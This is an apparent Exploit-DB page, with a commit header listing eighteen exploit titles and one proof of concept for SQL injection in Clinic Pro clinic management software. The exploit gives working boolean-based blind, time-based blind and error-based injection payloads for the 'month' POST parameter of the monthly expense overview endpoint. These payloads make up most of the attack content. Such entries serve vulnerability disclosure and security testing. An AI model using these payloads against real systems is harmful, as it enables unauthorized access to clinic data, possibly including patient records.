9d7b2f64d5
18 changes to exploits/shellcodes Canarytokens 2019-03-01 - Detection Bypass SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion) WebKit JavaScriptCore - 'createRegExpMatchesArray' Type Confusion iOS < 12.2 / macOS < 10.14.4 XNU - pidversion Increment During execve is Unsafe WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free WebKitGTK+ - 'ThreadedCompositor' Race Condition Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter) AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow AIDA64 Extreme / Engineer / Network Audit 5.99.4900 - SEH Buffer Overflow (EggHunter) TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit) PhreeBooks ERP 5.2.3 - Remote Command Execution Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit) iScripts ReserveLogic - SQL Injection Clinic Pro v4 - 'month' SQL Injection Ashop Shopping Cart Software - SQL Injection PhreeBooks ERP 5.2.3 - Arbitrary File Upload
31 lines
No EOL
1 KiB
Text
31 lines
No EOL
1 KiB
Text
# Title: Clinic Pro - Clinic Management Software
|
|
# Date: 03.04.2019
|
|
# Exploit Author: Abdullah Çelebi
|
|
# Vendor Homepage: https://softwebinternational.com
|
|
# Software Link: https://cms.softwebinternational.com
|
|
# Category: Webapps
|
|
# Tested on: WAMPP @Win
|
|
# Software description:
|
|
It is developed by PHP Codeigniter Framework with HMVC Pattern. Clinic
|
|
system can be easily configured and fully automated as per clinic
|
|
requirement using this Automation Software.
|
|
|
|
# Vulnerabilities:
|
|
# An attacker can access all data following an authorized user login using
|
|
the parameter.
|
|
|
|
|
|
# POC - SQLi :
|
|
|
|
# Parameter: month (POST)
|
|
# Request URL: http://localhost/welcome/monthly_expense_overview
|
|
# Type : boolean-based blind
|
|
month=06%' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 06 ELSE 0x28 END)) AND
|
|
'%'='
|
|
|
|
# Type : time-based blind
|
|
month=06%' AND 4514=BENCHMARK(5000000,MD5(0x436d7970)) AND '%'='
|
|
|
|
# Type : error-based
|
|
month=06%' AND EXTRACTVALUE(2633,CONCAT(0x5c,0x7178766271,(SELECT
|
|
(ELT(2633=2633,1))),0x7171717171)) AND '%'=' |